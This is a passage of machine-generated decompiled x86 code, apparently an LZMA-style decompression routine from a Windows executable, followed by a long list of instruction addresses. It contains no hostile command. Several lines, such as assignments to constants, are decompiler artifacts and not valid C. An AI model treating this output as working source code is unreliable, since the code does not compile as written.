							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













              0x00000000
              0x00406c5b
              0x00406c5b
              0x00406c60
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00000000
              0x00407318
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x00000000
              0x0040733a
              0x00406c62
              0x00406c62
              0x00406c66
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ef0
              0x00406ef3
              0x00406e96
              0x00406e9c
              0x00000000
              0x00000000
              0x00000000
              0x00406ef5
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e93
              0x00000000
              0x00406e93
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d9f
              0x00406da2
              0x00406d19
              0x00406d19
              0x00406d1f
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e2c
              0x00406e2f
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dcf
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00407006
              0x00407006
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x00406d2b
              0x00000000
              0x00000000
              0x00000000
              0x00406da8
              0x00406cf4
              0x00406cf8
              0x00407465
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d16
              0x00000000
              0x00406d16
              0x00406da2
              0x00406cab
              0x00406adf
              0x00406adf
              0x00406ae8
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x00000000
              0x004072c4
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
